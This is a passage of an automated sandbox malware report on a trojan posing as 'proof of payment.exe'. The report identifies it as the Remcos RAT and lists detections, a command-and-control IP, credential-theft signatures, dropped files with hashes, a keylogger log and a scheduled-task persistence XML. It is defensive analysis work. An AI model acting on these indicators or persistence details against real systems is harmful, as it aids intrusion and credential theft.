WmiPrvSE.exe 19->34         started        36 conhost.exe 19->36         started        38 conhost.exe 21->38         started        40 conhost.exe 25->40         started        file9 signatures10 process11 signatures12 84 Tries to steal Instant Messenger accounts or passwords 27->84 86 Tries to steal Mail credentials (via file / registry access) 27->86 88 Tries to harvest and steal browser information (history, passwords, etc) 30->88

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    proof of payment.exe56%VirustotalBrowse
                    proof of payment.exe61%ReversingLabsByteCode-MSIL.Trojan.Taskun
                    proof of payment.exe100%AviraHEUR/AGEN.1306895
                    proof of payment.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\NvbYSEq.exe100%AviraHEUR/AGEN.1306895
                    C:\Users\user\AppData\Roaming\NvbYSEq.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\NvbYSEq.exe61%ReversingLabsByteCode-MSIL.Trojan.Taskun
                    C:\Users\user\AppData\Roaming\NvbYSEq.exe56%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    geoplugin.net4%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://geoplugin.net/json.gp100%URL Reputationphishing
                    http://www.imvu.comr0%URL Reputationsafe
                    http://geoplugin.net/json.gp/C100%URL Reputationphishing
                    http://www.ebuddy.com0%URL Reputationsafe
                    37.120.235.1220%Avira URL Cloudsafe
                    http://geoplugin.net/json.gp20%Avira URL Cloudsafe
                    http://geoplugin.net/json.gpOw0%Avira URL Cloudsafe
                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gp_0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gp20%VirustotalBrowse
                    http://geoplugin.net/json.gp_0%VirustotalBrowse
                    37.120.235.1220%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    geoplugin.net
                    		178.237.33.50
                    		truefalseunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gptrue
                    • URL Reputation: phishing
                    		unknown
                    37.120.235.122true
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.google.comproof of payment.exe, proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      		high
                      http://www.imvu.comrproof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://geoplugin.net/json.gp/Cproof of payment.exe, 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
                      • URL Reputation: phishing
                      		unknown
                      http://www.imvu.comproof of payment.exe, proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        		high
                        http://geoplugin.net/json.gp2proof of payment.exe, 00000007.00000002.3915851761.00000000015B5000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/accounts/serviceloginproof of payment.exefalse
                          		high
                          https://login.yahoo.com/config/loginproof of payment.exefalse
                            		high
                            http://geoplugin.net/json.gpOwproof of payment.exe, 00000007.00000002.3915851761.00000000015B5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.nirsoft.netproof of payment.exe, 0000000F.00000002.1695925897.00000000009C4000.00000004.00000010.00020000.00000000.sdmpfalse
                              		high
                              http://www.nirsoft.net/proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameproof of payment.exe, 00000000.00000002.1499485685.0000000002661000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 00000008.00000002.1538465921.0000000002648000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comproof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://geoplugin.net/json.gp_proof of payment.exe, 00000007.00000002.3915851761.00000000015B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.ebuddy.comproof of payment.exe, proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  37.120.235.122
                                  		unknownRomania
                                  		3210SECURE-DATA-ASROtrue
                                  178.237.33.50
                                  		geoplugin.netNetherlands
                                  		8455ATOM86-ASATOM86NLfalse

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1435940
                                  Start date and time:2024-05-03 13:12:11 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 11m 5s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:24
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:proof of payment.exe
                                  Detection:MAL
                                  Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@28/15@1/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 151
                                  • Number of non-executed functions: 367
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  12:13:18Task SchedulerRun new task: NvbYSEq path: C:\Users\user\AppData\Roaming\NvbYSEq.exe
                                  13:13:16API Interceptor5159750x Sleep call for process: proof of payment.exe modified
                                  13:13:18API Interceptor13x Sleep call for process: powershell.exe modified
                                  13:13:19API Interceptor1x Sleep call for process: NvbYSEq.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  37.120.235.122proof of paymentt.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                    178.237.33.50fatura.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • geoplugin.net/json.gp
                                    proof of paymentt.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • geoplugin.net/json.gp
                                    586 R1 M-LINE - GEORGIA 03.05.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • geoplugin.net/json.gp
                                    xi0TpAxHGMsm.exeGet hashmaliciousRemcosBrowse
                                    • geoplugin.net/json.gp
                                    PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • geoplugin.net/json.gp
                                    REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                    • geoplugin.net/json.gp
                                    INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                    • geoplugin.net/json.gp
                                    Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                    • geoplugin.net/json.gp
                                    GVV.exeGet hashmaliciousRemcosBrowse
                                    • geoplugin.net/json.gp
                                    INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                                    • geoplugin.net/json.gp

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    geoplugin.netfatura.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 178.237.33.50
                                    proof of paymentt.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 178.237.33.50
                                    586 R1 M-LINE - GEORGIA 03.05.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    xi0TpAxHGMsm.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 178.237.33.50
                                    INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    GVV.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    ATOM86-ASATOM86NLfatura.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 178.237.33.50
                                    proof of paymentt.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 178.237.33.50
                                    586 R1 M-LINE - GEORGIA 03.05.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    xi0TpAxHGMsm.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 178.237.33.50
                                    INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    GVV.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    SECURE-DATA-ASROproof of paymentt.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 37.120.235.122
                                    Ei6JHlax9A.exeGet hashmaliciousRemcosBrowse
                                    • 37.120.235.114
                                    c5YXaP80M6975Ej.exeGet hashmaliciousRemcosBrowse
                                    • 37.120.235.114
                                    SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllGet hashmaliciousCobaltStrikeBrowse
                                    • 37.120.232.43
                                    ATT00001.pngGet hashmaliciousHTMLPhisherBrowse
                                    • 37.120.234.46
                                    8uT94eNAur.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Mars Stealer, Monster Stealer, PureLog StealerBrowse
                                    • 37.120.237.196
                                    rKYmlnOolQ.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                    • 37.120.237.196
                                    ry4836TEeV.exeGet hashmaliciousDridex Dropper, RisePro StealerBrowse
                                    • 37.120.237.196
                                    ry4836TEeV.exeGet hashmaliciousDridex Dropper, RisePro StealerBrowse
                                    • 37.120.237.196
                                    RUWXufvW4x.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Glupteba, LummaC Stealer, Mars Stealer, Monster StealerBrowse
                                    • 37.120.237.196

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\ProgramData\remcos\logs.dat

                                    Download File
                                    Process:C:\Users\user\Desktop\proof of payment.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):144
                                    Entropy (8bit):3.3829237234308707
                                    Encrypted:false
                                    SSDEEP:3:rhlKlFflWlN/Mi5JWRal2Jl+7R0DAlBG45klovDl6v:6llMn5YcIeeDAlOWAv
                                    MD5:80BAF8D4D3538963627F7AFA47526DE5
                                    SHA1:5A6EABD23D7B29925E8CE4D791FE571E08FE8AD7
                                    SHA-256:57635BC92E9C153A832E1FD25562323B7DEEF2B6B0E6589AC63E932B2D2E4C5A
                                    SHA-512:CE6627FD8598C6F9F7779EBFC079B87BF4009A9B1AE080AC8B8AF2B1FEA94D7CA5AE92BB207C0A56FD83CC14089D26721DE476931418C05E63283235F58814F2
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                    Reputation:low
                                    Preview:....[.2.0.2.4./.0.5./.0.3. .1.3.:.1.3.:.1.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NvbYSEq.exe.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\NvbYSEq.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.34331486778365
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\proof of payment.exe.log

                                    Download File
                                    Process:C:\Users\user\Desktop\proof of payment.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.34331486778365
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\json[1].json

                                    Download File
                                    Process:C:\Users\user\Desktop\proof of payment.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):965
                                    Entropy (8bit):5.023161606859709
                                    Encrypted:false
                                    SSDEEP:12:tkeknd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7Pp:qPdVauKyGX85jvXhNlT3/7AcV9Wro
                                    MD5:213C021986665186ADF388537CF7904A
                                    SHA1:AC939D70CA45E2BC2643EC9C2B491E39AFFD7B1A
                                    SHA-256:59379A6DB89949B709D13D99B13CE3F5B9B9F3064198304C6DB83D3503A46825
                                    SHA-512:07DE974A4EA0E3F0684165D0184C14801B02DA4541A244262107E33B4B2FFE7FE34924171CEB8126357E1DE15064EE43D7737C58E6A5B4188CECF3A0AEA1E68B
                                    Malicious:false
                                    Preview:{. "geoplugin_request":"191.96.227.219",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2232
                                    Entropy (8bit):5.380805901110357
                                    Encrypted:false
                                    SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZSUyus:lGLHyIFKL3IZ2KRH9OugEs
                                    MD5:4AD173050672D4E4D906A6827BD76175
                                    SHA1:971C60C54970A8C94A85753FB9301C49CAF63FE0
                                    SHA-256:FB92B93A8CCCB82D3449F3CA68452EEF78C571C95D7DB84CC9B12C8D6C0498C1
                                    SHA-512:49C6D82B927706A7152FDA8ABE53836619B2A2EECFA4D473B6F63F9506579255F552E3F5CB67654D7EF32B45BEE83AA5CE110E3C01BEEBFA852DDBD7C2C60BFC
                                    Malicious:false
                                    Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awqileim.5v0.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_smkerehp.vro.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoz05yv4.zfh.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwvdb22p.hvf.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\bhv58.tmp

                                    Download File
                                    Process:C:\Users\user\Desktop\proof of payment.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0155ffb7, page size 32768, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):15728640
                                    Entropy (8bit):0.10807997132117475
                                    Encrypted:false
                                    SSDEEP:1536:GSB2jpSB2jFSjlK/gw/ZweshzbOlqVqww/ZXesozbElqVqgesKzbdzb+zb6:Ga6amUueqaJEeqv7tW
                                    MD5:40D660B4AE3EF5A4D0EDCE7216A746FD
                                    SHA1:4725EF64323F955EFE529DA3EE8F7DC0EA1E8626
                                    SHA-256:D264158F0DB89FF6E751CF3697F21AD1B462A3866A737B0836194672AE24B67A
                                    SHA-512:91044A1F5380FB982FAE2ACA51AF917C239E6A1D04798E3262037B5670EA37DBB7A7C5AA4197C8A7C7514790EE465B3183504A152F501F37729617DE898F8E22
                                    Malicious:false
                                    Preview:.U..... ...................':...{........................L..........{#. ....{M.h.N.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{..................................Jc|. ....{M.................... ....{M..........................#......h.N.....................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp

                                    Download File
                                    Process:C:\Users\user\Desktop\proof of payment.exe
                                    File Type:XML 1.0 document, ASCII text
                                    Category:dropped
                                    Size (bytes):1566
                                    Entropy (8bit):5.08843411652121
                                    Encrypted:false
                                    SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewLv:HeLwYrFdOFzOz6dKrsuq2
                                    MD5:DA2728ED3578E03A7B01831B0FEEE30D
                                    SHA1:D037D81CD9CB7EEA089B1ABAEA9FA45EBECF0ACD
                                    SHA-256:10B5B0FB86E77C0EF27565A750B6D7931599F18C2D5E7700EE81D75E92ED47F0
                                    SHA-512:479D08B7F062092B194FD9F50367DFB530136736DA9111DBCA663F23E5D1AEF1F64700CEE450C0E270186D9EA6D31309D1B6074C344D3F1BC70C815174F02958
                                    Malicious:true
                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                    C:\Users\user\AppData\Local\Temp\tmpE166.tmp

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\NvbYSEq.exe
                                    File Type:XML 1.0 document, ASCII text
                                    Category:dropped
                                    Size (bytes):1566
